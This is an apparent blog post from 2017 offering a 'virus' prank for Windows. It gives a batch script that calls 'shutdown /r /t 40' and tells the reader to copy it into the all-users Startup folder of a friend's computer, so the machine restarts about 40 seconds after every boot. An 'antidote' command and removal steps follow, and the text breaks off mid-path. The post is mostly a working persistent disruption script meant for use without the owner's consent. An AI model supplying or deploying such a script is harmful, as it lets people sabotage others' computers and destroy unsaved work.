Posts

Showing posts from October, 2017

Virus : Restart their computer continously......

Image
Hello guys This trick will help to prank on your friends... Simply paste this coding in notepad and save this as *.bat (ex: shut.bat). ................................................................................................... @echo     off echo message here shutdown /r /t 40 /c "HAVE FUN" ....................................................................................................  And the last step paste this file in following directory:- "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" Now your freinds computer will restart every time in span of  40 seconds. ANTIDOTE: Simply save this line in notepad as antidote.bat .......................................... shutdown /a .......................................... Then after restart, fastly click this file to abort one time restart And then delete this file from startup folder or given directory "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup...